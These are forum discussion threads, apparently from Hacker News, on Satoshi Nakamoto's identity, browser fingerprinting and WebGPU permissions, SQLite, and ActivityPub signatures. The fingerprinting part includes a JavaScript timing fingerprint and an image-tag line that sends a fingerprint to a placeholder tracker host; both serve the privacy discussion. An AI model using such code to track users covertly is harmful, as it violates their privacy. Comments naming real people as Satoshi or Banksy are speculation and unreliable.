I think there is some systematic reason why people like Satoshi, Buckethead, Banksy, etc. are not uncovered.
In each case, I doubt that it really is hard to figure out who they are.
Maybe it is the way the press and social media work. You get as many clicks for a wild theory as you get for a properly researched opinion.
As for Satoshi Nakamoto: The most obvious candidate seems to be Adam Back. His invention of proof of work, his biography, character, writing style and role as the CEO of the company behind the main wallet software all point to him. There's also his recent comment that "Bitcoin looks like something that was discovered rather than invented". That's the kind of thing a creator typically says about a particularly great piece of work they did. Are there any arguments why he might not be the inventor of Bitcoin?
> As for Satoshi Nakamoto: The most obvious candidate seems to be Adam Back. His invention of proof of work, his biography, character, writing style and role as the CEO of the company behind the main wallet software all point to him.
Adam Back is obviously not Satoshi.
His level of writing or thinking is not even close to the level of Satoshi.
When asked what people should pay with when fees were high and Lightning Network wasn't complete, he seriously suggested people should just use tabs:
"Use another cryptocurrency" would be a much better recommendation that would solve the problem much better than tabs.
The reason why Bitcoin stopped working well is that Adam Back and others were actively sabotaging its ability to cope with demand, instead pushing people towards other solutions.
Those solutions were nowhere near ready, so the best Adam could come up with (short of admitting they were wrong) was tabs.
So yeah, instead of a brainfart it could just be malicious behavior.
The question asked on that video does not mention lightning.
But his answer begins by explaining lightning.
Back foresaw early on that lightning, not larger blocks, is the way forward. Which is another indication to me that he is indeed Nakamoto.
It was a great insight, very much in line with Nakamoto's thinking. Nakamoto, who foresaw so many things early on, like the need for a script instead of just transaction data on the chain.
Meanwhile, in actual 2023, Bitcoin once again has a bloated mempool and high transaction fees while big-block Bitcoin Cash is clearing regularly.
I think we have enough real history at this point to dismiss the notion that "lightning is the way forward" in an absolute, concrete and not theoretical way.
Entries on a blockchain are auctioned off in an auction which allows arbitrarily low bids. So it is to be expected that there is a long tail of bids with a low chance of winning.
If a mempool clears, that just means there is limited demand to use the chain, even for free.
> It can be phased in, like: if (blocknumber > 115000) maxblocksize = largerlimit It can start being in versions way ahead, so by the time it reaches that block number and goes into effect, the older versions that don’t have it are already obsolete.
That lightning still has shit UX without relying on third parties should be proof enough that it was and still is a terrible idea to rely on for Bitcoin's usability.
Before lightning was a thing, he anticipated the block size would increase over time. And he changed his mind when the idea of layer 2 came up. Which was the right thing to do. But hard to understand at the time.
UX is a problem throughout all crypto. No matter which coin, no matter L1 or L2. It's all still like the internet before the 90s.
I don't know about the others, but Banksy has been uncovered. It's Robin Gunningham. People still like to say it's "unconfirmed" and "a rumour" but if you look at the evidence there is no real doubt.
So I guess part of the reason is that people love the mystery so much, as long as the suspect doesn't come out and say "yes it's me" then they'll just hang on to the mystery. To be honest even if Gunningham said "I am Banksy" I suspect people would still say "but is he really? Nobody knows!"
Wikipedia says "Banksy is a pseudonymous England-based street artist, political activist and film director whose real name and identity remain unconfirmed and the subject of speculation."
Oh, interesting. So he only keeps his face secret, not his identity?
I remember reading an interview with Ozzy Osbourne who said he refused to work with Buckethead because it spooked him that BH always kept a mask on, even when they talked in private.
You can also find some pictures of his face on Google if you just search his name. I'd say Buckethead is closer to Thomas Bangalter and Guy-Manuel de Homem-Christo than he is to Banksy.
>systematic reason why people like Satoshi, Buckethead, Banksy, etc are not uncovered.
With Satoshi and Banksy it's not so hard to figure out but given that they both want anonymity, informed people tend not to say. Meanwhile random idiots post all sorts of stuff, some right, some wrong.
CORS is a browser security measure to protect users from malicious sites. This is an app and not a web browser and is therefore allowed to send HTTP requests to any URL it wants and to parse the HTTP responses as it deems necessary.
A possible DIY way is to use an e-ink display connected to a Raspberry Pi and write a script to display content stored on a USB stick plugged into the Pi's USB port.
Just one example: A script which runs many different types of computations. Each computation will take a certain amount of time depending on your hardware and software. So you will get a fingerprint like this:
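(The numbers below are made up, just to illustrate the shape of such a fingerprint: a vector of per-computation timings.)

integer loop:   3.1 ms
regex matching: 41.7 ms
float math:     5.9 ms
string ops:     12.4 ms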
Just put WebGL/WebGPU behind a permission and the problem is solved. I don't understand why highly paid Google and Firefox developers cannot understand such a simple idea.
For a user to correctly answer a permissions dialog, they need to learn programming and read all the source code of the application. To say nothing of the negative effects of permission dialog fatigue.
In practice, no-one who answers a web permissions dialog truly knows if they have made the correct answer.
Asking the user a question they realistically can't answer correctly is not a solution. It's giving up on the problem.
I think browsers should distinguish more aggressively between "web application", "web site", and "user hostile web site".
Many APIs should be gated behind being a web application. This itself could be a permission dialog already, with a big warning that this enables tracking and "no reputable web site will ask for it unless it is clear why this permission is needed - in doubt, choose no".
Collect opt-in telemetry. Web sites that claim to be a web application but keep getting denied can then be reclassified as hostile web sites, at which point they not only lose the ability to annoy users with web app permission prompts, but also other privileges that web sites don't need.
Clearly if we knew how to perfectly identify user hostile websites we'd not need permissions dialogs at all.
Distinguishing between site and app, e.g. via an installation process, is equivalent to a permissions dialog, except that you're now advocating for one giant permission dialog instead of fine-grained ones, which seems like a step backwards.
Yes, if we knew how to do it perfectly, we wouldn't need them. But we can identify some known-good and known-bad cases with high confidence. My proposal mainly addresses the "fatigue" aspect: it allows apps to use some of the more powerful features without letting every web site use them, and it prevents random web sites from declaring themselves an app and spamming users with the permission request just so they can abuse the users more.
The new permission dialog wouldn't grant all of the finer-grained permissions - it would be a prerequisite to requesting them in the first place.
Curating known good would equate to some sort of app store. There are probably initiatives to make one for web apps, but it kind of makes me sad to think of applying that to the web, which is supposed to be a free and open commons (although I suppose Google already de facto controls enough of it to be considered a bit of a gatekeeper).
Making the user the arbiter of "known good", i.e. reliance on permission dialogs, is not perfect but it's what we have. Yet I fail to see how your proposal of "just add ANOTHER dialog" improves the situation.
Do you have something specific in mind with your opening paragraph?
Because defining what is a web site and what's an app strikes me as a particularly impractical idea. You correctly point out that yes, there are a number of powerful APIs that should be behind permissions. But there are a number of permissions already, so we need to start bundling them and also figure out how to present all this to the regular user.
Frankly, I wouldn't know where to begin with all this.
News sites are a particular category that I expect to spam people with permission prompts, as they did when notifications became a thing. Without the deterrent of possibly landing in the naughty box, they'd all do it. With it, I still expect some of them to try until they land in the box.
> In practice, no-one who answers a web permissions dialog truly knows if they have made the correct answer.
Counterpoint: if a webpage with the latest news (for example) immediately asks me to allow notifications, webcam access and location, I definitely know the correct answer to those dialogs.
"Do you want to allow example.com to send you notifications" is way more understandable to a layperson than "do you want to allow access to WebGPU" or "do you want to allow access to your graphics card". Especially because they would still have access to canvas and WebGL.
Permission prompts are a HUGE user education issue and also a fatigue issue. Rendering is widely used on websites so if users get the prompt constantly they're going to tune it out.
They don't need to learn programming. Just write that this technology can be used for displaying 3D graphics and for fingerprinting, and let the user decide whether to take the risk.
They're going to be confused if you say "display 3D graphics", because canvas and WebGL will still work. The website will just be laggier and burn their battery faster. That's not going to make sense to them.
"Fingerprinting" is a better approach to the messaging, but is also going to be confusing since if you take that approach, almost all modern permissions are fingerprinting permissions, so now you have the problem of "okay, this website requires fingerprinting class A but not fingerprinting class B" and we expect an ordinary user to understand that somehow?
Most of them will say, "I need to see this site, who cares about fingerprints." Some will notice that they're on their screen anyway, a few will know what it's all about.
Maybe "it can be used to display 3D graphics and to track you", but I expect that most people will shrug and go on.
The page implies it no longer requires permissions, but I just tested and you definitely get a permissions popup, just a different one.
WebHID, WebUSB and Filesystem Access are, IIRC, "considered harmful", so they won't get implemented. And sensor support was removed after sites started abusing battery APIs.
I'm not. It's a bit of sarcasm, listing a subset of APIs that browsers implement (or push forward against objections, like the hardware APIs) and that all require some sort of permission.
> but this is exactly the path Firefox was advocating
Originally? Perhaps. Since then Firefox's stance is very much "we can't just pile on more and more permissions for every API because we can't properly explain to the user what the hell is going on, and permission fatigue is a thing"
Everything except WebGL and WebGPU allows the system to change more state than what is rendered on a screen.
Users already expect browsers to change screen contents. That's why WebGPU / WebGL aren't behind a permission block (any more so than "show images" should be... Hey, remember back in the day when that was a thing?).
Saturating the user with permissions requests for every single website they visit is a dead-end idea. We have decades of browser development and UI design history to show that if you saturate the user with nag prompts that don't mean anything to them, they will just mechanically click yes or no (whichever option makes the website work).
Permission popups can be replaced with an additional permission toolbar or with a button in the address bar the user needs to click. This way they won't be annoying and won't require a click to dismiss.
Like the site settings page on Chrome, which is in the address bar (clicking the lock icon)? You can set the permissions (including defaults) for like 50 of these APIs.
We already have extensions for websites that spam the user with unwanted popups and other displays. Those just need to be extended to cover permission abuse and be included by default in all web browsers.
I've been doing this forever, but I have to give explicit permission to load and run JS, which solves a lot of other problems as well. Letting any site just willy-nilly load code from wherever and run it on your machine is insane, and it's well worth the effort to manually whitelist every site.
It's not that they don't understand it, it's that they don't want the average user to have a convenient way to control this setting. Prompting the user for permission would give the user a very convenient way to keep it disabled for most websites. It's as simple as that.
Think about it this way: which is more tedious, going into the settings and enabling and disabling WebGPU every time you need it, or a popup? Which way would see you keeping it enabled?
"Completely co-incidentally", it's in Google's best interest to be able to fingerprint everyone.
So, changing it to actually be privacy friendly while they have the lion's share of the market doesn't seem like it's going to happen without some major external intervention. :/
It's running on Chrome. Google doesn't need fingerprinting. By making it harder for others to fingerprint, it actually cements Google's position in the ad market.
Just don’t use Chrome. There are plenty of alternative web browsers you can choose that are more privacy oriented. You are not Chrome’s customer unless you pay for it (or have a 100% money-back guarantee). Demanding features on a free product is never going to go anywhere.
You can reduce clock precision, which has already been done to mitigate speculative execution attacks. You can delay network requests to prevent the JS from using the server as a more precise clock. In addition to random delays, you can quantize execution times by only responding in 100ms increments, for example. You can do lots of things to mitigate fingerprinting, if not completely prevent it.
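For illustration, here is a minimal sketch of the quantization idea, monkey-patched into page context in JavaScript (real mitigations live inside the browser engine; this is just to show the principle):

// Coarsen the clock: only answer in 100 ms increments.
const realNow = performance.now.bind(performance);
const QUANTUM_MS = 100;
performance.now = () => Math.floor(realNow() / QUANTUM_MS) * QUANTUM_MS;

Any timing loop now sees 0, 100, 200, ... instead of sub-millisecond values, which starves a timing-based fingerprinting script of resolution.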
But then you could also just omit features that have no reason to exist in the first place.
You only get fingerprinting from your method if the variation of the “fingerprint“ between two different runs by the same user is lower than the difference you get between two different users. This is far from obvious since it depends a lot on the workload running on the machine at the time.
I'm not aware of a single fingerprinting tool that primarily uses this kind of timing attack rather than more traditional fingerprinting methods.
We would have to work out examples of what Computation1 and Computation2 are to predict whether certain types of workloads will impact the ratio of their performance.
Example:
// Time a simple arithmetic loop.
let s = performance.now();
let r = 0;
for (let i = 0; i < 1000000; i++) r += 1;
const t1 = performance.now() - s;
// Time a regex-heavy loop.
s = performance.now();
r = 0;
for (let i = 0; i < 1000000; i++) r += "bladibla".match(/bla/)[0].length;
const t2 = performance.now() - s;
console.log("Ratio: " + t2 / t1);
For me, the ratio is consistently larger in Chrome than in Firefox. Which workload would reverse that?
Fingerprinting in the usual sense of the term isn't about distinguishing Chrome from Firefox, it's about distinguishing user A from user B, … user X reliably, in order to be able to track the user across websites and navigation sessions.
Your example is unlikely to get you far.
Edit: in a quick test, I got a range between 8 and 49 in Chrome, and between 1.27 and 51 (!) in Firefox, on the same computer; the results are very noisy.
> Chrome and Firefox here are an example for "Two users who use exactly the same hardware but different software".
But it's also the most pathological example one can think of, yet the results are extremely noisy (while being very costly, which means you won't be able to run a large number of such tests without dramatically affecting the user's ability to just browse your website).
Sure. And nobody actually wants that, because it would be so restrictive in practice that you might as well just limit yourself to plain text.
The horse bolted long ago; there's little sense in trying to prevent future web platform features from enabling fingerprinting, because the existing surface that enables it is way too big to do anything meaningful about it.
Here are a couple of more constructive things to do:
- Campaign to make fingerprinting illegal in as many jurisdictions as possible. This addresses the big "legitimate" companies.
- Use some combination of allow-listing, deny-listing, and "grey-listing" to lock down what untrusted websites can do with your browser. I'm sure I've seen extensions and Pi-hole type products for this. You could even stop your browser from sending anything to untrusted sites except simple GET requests to pages that show up on Google. (I.e. make it harder for them to smuggle information back to the server.)
- Support projects like the Internet Archive that enable viewing large parts of the web without ever making a request to the original server.
This would essentially mean that every computation would have to run as slow as the slowest supported hardware. It would completely undermine the entire point of supporting hardware acceleration.
I’m sympathetic to the privacy concerns but this isn’t a solution worth considering.
Everything that can be used for fingerprinting should be behind a permission. Almost all sites I use (like Google, Hacker News or Youtube) need none of those technologies.
The main thing that ought to be behind a permission is letting JavaScript initiate connections or modify anything that might be sent in a request. It should be possible, but ought to require asking first.
If the data can't be exfiltrated, who cares if they can fingerprint?
Letting JS communicate with servers without the user's explicit consent was the original sin of web dev, that ruined everything. Turned it from a user-controlled experience to one giant spyware service.
If javascript can modify the set of URLs the page can access (e.g. put an image tag on the page or tweak what images need to be downloaded using CSS) then it can signal information to the server. Without those basic capabilities, what's the point of using javascript?
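To make that concrete, here is a sketch of the image-tag channel (the tracker URL and fingerprint value are made up):

// Even without fetch/XHR, JS can smuggle data out by encoding it
// into a URL the browser will request on its own.
const fingerprint = "abc123"; // hypothetical value to exfiltrate
const img = new Image();
img.src = "https://tracker.example/p.gif?fp=" + encodeURIComponent(fingerprint);
// Setting .src is enough to trigger the request; no DOM insertion needed.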
No video driver is actually going to implement fixed-time rendering. So you'd have to implement it in user-space, and it would be even slower than WebGL. Nobody wants that. You're basically just saying the feature shouldn't ship in an indirect way (which is a valid opinion you should just express directly.)
I don't mean to prescribe the way to stop fingerprinting, just throwing out a trivial existence proof, and maybe a starting point for thinking, that it's not impossible as was suggested.
Also, WebGPU seems to conceptually support software rendering ("fallback adapter"), where fixed time rendering would seem to be possible even without getting cooperation from HW drivers. Being slower than WebGL might still be an acceptable tradeoff at least if the alternative WebGL API avenue of fingerprinting could be plugged.
Could you explain what techniques would make this possible? I can see how it's possible in principle, if you, say, compile JS down to bytecode and then have the interpreter time the execution of every instruction. I don't immediately see a way to do it that's compatible with any kind of efficient execution model.
The rest would be optimization while keeping the timing side-channel constraint in mind; hard to say what the performance possibilities are. For example, not all computations have externally observable side effects, so those parts could be executed conventionally if the runtime could guarantee it. Or the program-visible clock APIs might keep virtual time that makes operations seem slower (from a timing POV) than they are, combined with network API checkpoints that halt execution until real time catches up with virtual time. Etc. Seems like an interesting research area.
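A hypothetical sketch of that virtual-time idea, under the assumption that the runtime charges every operation a fixed, machine-independent cost (all names here are made up):

let virtualTimeMs = 0; // what the program's clock APIs would report
const realStartMs = performance.now();

function charge(opCostMs) {
  virtualTimeMs += opCostMs; // same charge on every machine
}

function virtualNow() {
  return virtualTimeMs; // timing code only ever sees this
}

// Network checkpoint: stall the request until wall-clock time has
// caught up with virtual time, so a server can't act as a truer clock.
async function networkCheckpoint() {
  const realElapsedMs = performance.now() - realStartMs;
  const lagMs = virtualTimeMs - realElapsedMs;
  if (lagMs > 0) await new Promise(resolve => setTimeout(resolve, lagMs));
}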
>not all computations have externally observable side effects
You can time any computation. So they all have that side effect.
Also, from Javascript you can execute tons of C++ code (e.g. via DOM manipulation). There's no way all of that native code can be guaranteed to run with consistent timing across platforms.
Depends on who you mean by "you". In context of fingerprinting resistance the timing would have to be done by code in certain limited ways using browser APIs or side channels that transmit information outside the JS runtime.
Computations that call into native APIs can be put in the "has observable side effects" category (but in more fine grained treatment, some could have more specific handling).
In this case the runtime would not be able to guarantee that the timing has no externally observable side effects (at least if you do something with t). It would then run in the fixed execution speed mode.
Lots of code accesses the current time. So I think you'd end up just running 90% of realistic code in the fixed execution speed mode, which wouldn't be sufficiently performant.
It's hard to reason about how much noise is guaranteed to be enough, because it depends on how much measurement the adversary has a chance to do; there could be collusion between several sites, etc. To allow timing API usage I'd be more inclined toward the virtual time thing I mentioned upthread.
My prediction: SQLite will keep gaining popularity.
Especially among pragmatic software builders who run their own business and do not work for the man. A demographic that I expect to grow.
Talking about SQLite: Is there any downside to partitioning an SQLite db into multiple files?
For example, one of my systems has a table 'details' which is not vital for the system to work. It's just nice to have the data in this table. And it is pretty big, growing fast.
When I copy the DB over to another system, I don't need that table. So it would be nice to have like primary.db and secondary.db. With 'details' in secondary.db. Any downside to this approach? Are JOINS slower across two files than across two tables in the same file?
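(For reference, the mechanism I have in mind is ATTACH. A sketch with made-up table and column names:)

-- open primary.db as the main database, then:
ATTACH DATABASE 'secondary.db' AS secondary;
SELECT m.id, d.payload
  FROM main.items AS m
  JOIN secondary.details AS d ON d.item_id = m.id;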
SQLite has seen runaway popularity on HN lately, and I bought into the hype too for a while, but when I look under the hood, the third-party backup and replication stories just seem janky, tedious and not yet mature. It's the kind of thing where a misconfiguration could wipe out everything and/or waste hours of your time.
>Especially among pragmatic software builders who run their own business and do not work for the man.
That's the perfect use case for a SaaS database. Administering a database adds zero business value and you'd be doing it to save at most $50 a month.
> SQLite has seen runaway popularity on HN lately, and I bought into the hype too for a while, but when I look under the hood, the third-party backup and replication stories just seem janky, tedious and not yet mature. It's the kind of thing where a misconfiguration could wipe out everything and/or waste hours of your time.
If you treat it as a database outside of your application code, yes. Its "database replication" tools are far behind.
But that's "using it wrong". Outside of the application code using it, a sqlite database should be treated as a file, that's the whole magic of it.
Backup and replication tools for files are great and mature, far more mature than for most database. Something as simple as rsync already covers 99% of use case you need for it.
If you need "live replication across multiple servers" or something like that, you're completely out of the scope of the what sqlite is made for.
I also find SQLite to be a poor solution for a backend database.
In particular - it makes it incredibly frustrating to manage multiple instances accessing it, and has some very strict limitations around how the underlying FS is mounted.
SQLite is an incredible tool - but the right place for it is in a deployed client application (where - seriously - it's a first class project and is an incredible joy). It's not really designed to be your web db.
Prior art warning: every shack that rents out a /home/$customerid slice running phpmyadmin is already on the seller side of the SaaS database market. That market is just not very interesting.
> When I copy the DB over to another system, I don't need that table. So it would be nice to have like primary.db and secondary.db. With 'details' in secondary.db. Any downside to this approach? Are JOINS slower across two files than across two tables in the same file?
I'm in the middle of refactoring my personal project such that "shared" data is in one database, and "personal" data is in a separate database; the idea being that every user will have a separate SQLite "connection", with their own "personal" data ATTACHed. I had reasonably extensive functional testing before the refactor, and after the refactor I didn't have any issues from a functional perspective.
Potential advantages:
- Each user can download their own "personal" database whenever they want
- This is essentially a form of "sharding", which should go a long way towards mitigating the "single writer" bottleneck; as the "shared data" will change much less frequently than the "personal" data. It should also make it fairly straightforward to distribute the workload across multiple servers / regions, should my project ever get that big.
Haven't done any performance testing yet.
Main issues I've encountered so far:
- Foreign key constraints across the databases are missing; that's just a reduction in safety, however.
- Golang's "automatic connection management" doesn't play well with SQLite's "ATTACH" command: it expects to automatically open new connections, but the secondary connections won't have the ATTACHed databases. This is solvable, but something to watch out for.
As implied, I'm still in the middle of changing things over, so it's early days; but so far things seem positive.
The very problem of SQLite: single user only. SQLite does have WAL, but it still doesn't allow concurrent writes unless you want to see file corruption.
This means SQLite is very much locked to things that work for one specific purpose and almost nothing else. Sure, you can be read-only, but you have to run alongside the app on the specific node, too.
Another problem (although without the single-user mindset this wouldn't be a problem at all) is high availability. You want to make sure that your database won't get lost, don't you?
Things like Litestream [1] attempt to solve the SQLite backup problem by continuously saving the database state and shipping it up to S3-compatible storage or a file system, but that's just half the story. You also want to make sure your operation keeps running. This is where HA comes in to save you from an emergency fixup while you are enjoying your holiday.
It doesn't mean that nobody has tried to solve both of these problems, though. Ahem, introducing rqlite [2]. My own experience with it was not great, because the memory usage is quite high and does not fit my needs (the embedded device only has 512MB on it, and every byte counts, sorry); I guess that's the price to pay if you want to turn a non-multiuser, non-concurrent-access database into one... Another honorable mention would be LiteFS [3], but I haven't used it yet, so I have no say on it.
Setting up Postgres is a PITA compared to SQLite, which comes bundled with Python these days. Obviously it's going to be a trade-off as to which one causes you more pain.
I mainly work as a sysadmin for small companies. (Most people don't call us when they install new tools; they call when things have exploded.) All my hatred goes out to the (Windows) programs (and their creators) that think they need MS SQL Express or the like to save their two bytes of dust.
All my love goes to the programs that just run/save from/to a UNC path.
Has SMB locking and oplocking become that much more reliable?
Pretty much one of the classic desktop support calls for me was "my access database on the shared drive is corrupt"
I'm out of touch now, but one of the failure modes seemed to be that a client would take out an oplock so it could do local caching etc. Then someone else opens the file, the server sends the oplock break to the original client, but that message gets lost/ignored, and we end up with two or more clients making unsynchronised changes to a file.
Any smb client access to shared data more complicated than documents and spreadsheets just makes me twitch these days.
It was a long time ago now, and it probably was more prevalent in larger environments.. just more chances for things to go wrong I'd guess.
If something is designed for shared filesystems that's different, but my experience was that at the low midrange things aren't. They seem to work, until they don't.
What's wrong with sql express? Assuming you fit within its size constraints?
> Pretty much one of the classic desktop support calls for me was "my access database on the shared drive is corrupt"
Yes, that one >12-year-old Access database with two concurrent users breaks biweekly. Everything else: no problems.
Just this Thursday I "moved" a program from an old PC to a new one. We've more or less supported this client for 7 years; the PC is from before that. Got the call. First time hearing about that lab software. Right click on the desktop icon. Oh, it just points to a UNC path on the "main server" (a Linux Samba share). Took a look into the settings. It has a path to a SQLite DB. Also just a UNC path.
Only two clients using it. It worked unattended for years. Since it's stored on the "main server" it's also covered by backup. No client side installation necessary.
Copy the link. Update our documentation that we know it exists, what is it used for and how it works. Done.
I see it time and time again: desktop software that runs on one PC, produces/saves tiny amounts of data (like a temperature monitor for one fridge), but installs a SQL server. A random technician shows up, installs it and leaves. We don't know that it exists. It's therefore not part of a backup concept. It's usually only discovered when it explodes or when the PC is renewed (or when a second PostgreSQL install creates a TCP port conflict). I have the feeling only 1 out of 10 "softwares" even has a proper concept for export and import of data.
A client with like 7 or 8 workers called me because he wanted me to move his new time tracking software. The technician who also installed the NFC reader apparently installed it on the wrong PC. It took over 3 hours! It downloaded GBs and GBs of .NET, SQL Express and what not. I didn't know that going in/clicking the setup.exe. I had to call support to get the Express DB over. I can still hear the hard drive screaming. ...man... for this stuff a Z80 and a CSV file would be enough. ...And I am the bad guy for explaining to the client that the DB needs to be backed up. I sound like I want to upsell him something.
I know, I know. This rant is not about databases. It's about the state of IT and arrogant developers who don't live in the trenches. The "pulling down additional gigabytes of images and runtime to run the database" > "Yes. It works great." triggered me. I'm sorry.
You know. Not everything is a unicorn webapp.
> Any smb client access to shared data more complicated than documents and spreadsheets just makes me twitch these days.
I know of multiple large install bases of an old medical software. It's still actively developed/supported, but it is so old that it doesn't use a SQL database but an ISAM one. It just sits there on a file share. No active server component to speak of. No client-side installation necessary.
> What's wrong with sql express? Assuming you fit within its size constraints?
If it is not used for something a CSV file would be enough for; if the customer is told that it needs to be installed "on a server"; if we get involved from the beginning so we know what is what; if the customer doesn't expect me to be able to move it out of the blue within seconds: then SQL Express is fine.
...which reminds me of that one time, when that well-hung developer of a software for the energy sector didn't know that Express can only allocate up to 2GB. Obviously he blamed us for delivering a faulty server...
agreed, running pg locally is a pain. I use a cloud postgres instance (even for local dev). They're dirt cheap and it's not worth the hassle of working with a local pg.
I love Postgres.app on mac, makes running locally a breeze. Running Postgres fast on the cloud is what I always struggled with (without paying enormous sums)
None that I can think of unless you need foreign key constraints between both.
> Are JOINS slower across two files than across two tables in the same file?
I was recently debugging a slow JOIN with ATTACH'ed databases, and the query plan looked the same as when both tables were in the same database. I don't think it makes any difference.
But in these situations, the solution is measuring and benchmarking for your use case.
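SQLite makes that easy to check yourself; e.g. (table names hypothetical, matching the ATTACH setup described above):

EXPLAIN QUERY PLAN
SELECT m.id, d.payload
  FROM main.items AS m
  JOIN secondary.details AS d ON d.item_id = m.id;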
I keep reaching for SQLite and it keeps working. Although I've been needing a better review of what other embedded databases I should be considering in 2022. I tried Genji[1] recently and tore it out as it wasn't doing ORDER BY with multiple columns.
> Especially among pragmatic software builders who run their own business and do not work for the man. A demographic that I expect to grow.
From the FAQ; there are lots of caveats (especially the last).
> Situations Where A Client/Server RDBMS May Work Better
> Client/Server Applications
> If there are many client programs sending SQL to the same database over a network, then use a client/server database engine instead of SQLite. SQLite will work over a network filesystem, but because of the latency associated with most network filesystems, performance will not be great. Also, file locking logic is buggy in many network filesystem implementations (on both Unix and Windows). If file locking does not work correctly, two or more clients might try to modify the same part of the same database at the same time, resulting in corruption. Because this problem results from bugs in the underlying filesystem implementation, there is nothing SQLite can do to prevent it.
> A good rule of thumb is to avoid using SQLite in situations where the same database will be accessed directly (without an intervening application server) and simultaneously from many computers over a network.
> High-volume Websites
> SQLite will normally work fine as the database backend to a website. But if the website is write-intensive or is so busy that it requires multiple servers, then consider using an enterprise-class client/server database engine instead of SQLite.
> Very large datasets
> An SQLite database is limited in size to 281 terabytes (2^48 bytes, 256 tebibytes). And even if it could handle larger databases, SQLite stores the entire database in a single disk file and many filesystems limit the maximum size of files to something less than this. So if you are contemplating databases of this magnitude, you would do well to consider using a client/server database engine that spreads its content across multiple disk files, and perhaps across multiple volumes.
> High Concurrency
> SQLite supports an unlimited number of simultaneous readers, but it will only allow one writer at any instant in time. For many situations, this is not a problem. Writers queue up. Each application does its database work quickly and moves on, and no lock lasts for more than a few dozen milliseconds. But there are some applications that require more concurrency, and those applications may need to seek a different solution.
For me an important caveat is the typing. With all respect for the original author of SQLite -- he has done an outstanding job -- I think he underestimates the value of a good type system. I have seen some databases that had all kinds of messy data. Back in the day MySQL was also quite loose with regard to checking data. Undoing the damage is in most cases not possible. For a business, data is more important than code, so be strict up front.
I know, SQLite has added the option to enforce type checking. The authors still don't believe in the value of it, and the available types are quite limited and thus loose. I think this is something that pgsql got quite right, where you can have your domain types at the database level.
On the other hand, if you keep this as a replacement for your config file (I thought this was the original purpose?), then yeah, you get an awesome deal. I wouldn't dare to build my business on it, just like I don't believe in MongoDB and any untyped language for serious purposes.
As others have pointed out, there's the strict mode now which is still quite restricted (pun intended), but what you most often don't hear is that you can also use check constraints, as in
sqlite> create table t ( id integer primary key, n integer check ( typeof( n ) = 'integer' ) );
sqlite> insert into t ( n ) values ( 1 );
sqlite> insert into t ( n ) values ( '1' );
sqlite> insert into t ( n ) values ( true );
sqlite> insert into t ( n ) values ( 'x' );
Runtime error: CHECK constraint failed: typeof( n ) = 'integer' (19)
sqlite> select * from t;
┌────┬───┐
│ id │ n │
├────┼───┤
│ 1 │ 1 │
│ 2 │ 1 │
│ 3 │ 1 │
└────┴───┘
sqlite> select ( select n from t where id = 1 ) = ( select n from t where id = 2 );
1 // i.e. true
Check constraints do have an advantage over more classical types: additional constraints can be declared, such as valid ranges for numerical types etc.
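For example (a made-up table combining a type check with a range check):

sqlite> create table scores ( id integer primary key, pct integer check ( typeof( pct ) = 'integer' and pct between 0 and 100 ) );
sqlite> insert into scores ( pct ) values ( 50 );   -- ok
sqlite> insert into scores ( pct ) values ( 101 );  -- fails the range check
Runtime error: CHECK constraint failed: typeof( pct ) = 'integer' and pct between 0 and 100 (19)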
>I think this is something that pgsql got quite right
I don't think so. For example, pgsql had an array type before it got JSON, so the drivers can't automatically convert arrays that you want to insert into JSON. With my SQLite ORM, you can just insert arrays and objects and it knows to convert them automatically to JSON.
I like that SQLite just has a few primitive types. My ORM will be able to build on top of them. For example, JavaScript will soon be adding new date types (Temporal), and I will create new types for that, which will be stored as text ultimately.
Which is quite limited in scope and does not allow for boolean (faux-boolean, of course) or json columns. It also affects certain operations in ways that might not be immediately obvious.
Not sure if this has received any further work since its release.
>If there are many client programs sending SQL to the same database over a network
I believe this is a reference to enterprises that have different users querying the database directly with SQL that they wrote over a network to a central database.
My prediction: Database gatekeeping will continue into next year.
Lots of "X is a toy database", "Y is all you need for every use case", "nobody really needs scalability, high availability, etc." and above all else "never use an ORM, real engineers write SQL by hand".
Are likes not federated through the Fediverse? If someone on mastodon.social likes a post on pixelfed.social, will that increase the like count on pixelfed.social?
Where receive.php is openly accessible and send.php is protected by a password.
The endpoints are surely called differently than receive.php and send.php. But this is how I would hope ActivityPub works in principle.
Of course, this would be very bare. To read, I would have to read the raw log of ActivityPub messages, and to post, I would have to manually put together an ActivityPub message.
But I would be in the Fediverse and could add more convenience functionality later.
- send requests with proper 'HTTP Signatures' (many AP nodes have strict enforcement here)
- which requires you to have an actor with an attached signing pubkey
- so you have to host the LD-JSON actor descriptor on another endpoint (see the sketch after this list)
- actors MUST have an attached inbox & outbox, your receive endpoint will need to sit at your actor's inbox (on POST). both of these are OrderedCollections of Activities
- and in order to be properly interoperable you will probably need to maintain follow relations & write an endpoint which can ACK/NAK follows, etc etc
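For illustration, a minimal actor descriptor looks roughly like this (the domain, username and key are placeholders):

{
  "@context": ["https://www.w3.org/ns/activitystreams",
               "https://w3id.org/security/v1"],
  "id": "https://example.com/actor",
  "type": "Person",
  "preferredUsername": "alice",
  "inbox": "https://example.com/inbox",
  "outbox": "https://example.com/outbox",
  "publicKey": {
    "id": "https://example.com/actor#main-key",
    "owner": "https://example.com/actor",
    "publicKeyPem": "-----BEGIN PUBLIC KEY-----\n...\n-----END PUBLIC KEY-----"
  }
}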
If admin of serverA decides to add serverB to the servers_i_talk_to array, they also ask serverB to give them a public key and from then on serverA only accepts messages from serverB if they are signed with the corresponding private key?
Is that so that serverB can change its IP without interrupting the communication with serverA?
The fediverse is (generally) an open federation, not a closed one like you're describing. There is no manually-curated list of instances that you federate with.
I would expect "Open Federation" does not mean you need to talk to every instance out there directly. But that it works like a web where messages are routed around. I could be wrong. But I would expect the "servers_i_talk_to" array is what the instances output at the "peers" endpoint:
There's not really any routing, but you don't need to send posts to every instance, just every instance that has users following your instance's users.
HTTP signatures ensure that you can't send a message and spoof the user/instance that it's coming from. Think of it like DKIM for AP.
They commonly include the specific actor who is interacting with the network (via the instance), so we can also achieve correct-side enforcement of blocks.
Sure, an actor is basically a user; there's usually an "instance actor" too that does some other things, but I don't think having one is required. Every actor has a private key, but it's kept on the server; it's basically an implementation detail.
Strange that users have private keys. Is that kinda forward-looking, so that at some point those keys could be moved to the users themselves? So they can keep their identity, even if the owner of their instance becomes malicious?
The private key is used in HTTP Signatures for authentication. The signature does not cover the body of the HTTP request and is not stored or published. The HTTP POST contains a header that signs just a few other header fields. The signature is only valid for a short time.
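Concretely, the signature travels in a header along these lines (all values are placeholders):

Signature: keyId="https://example.com/actor#main-key",
           algorithm="rsa-sha256",
           headers="(request-target) host date",
           signature="<base64-encoded RSA-SHA256 signature>"

Only the header fields listed in "headers" are covered by the signature.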
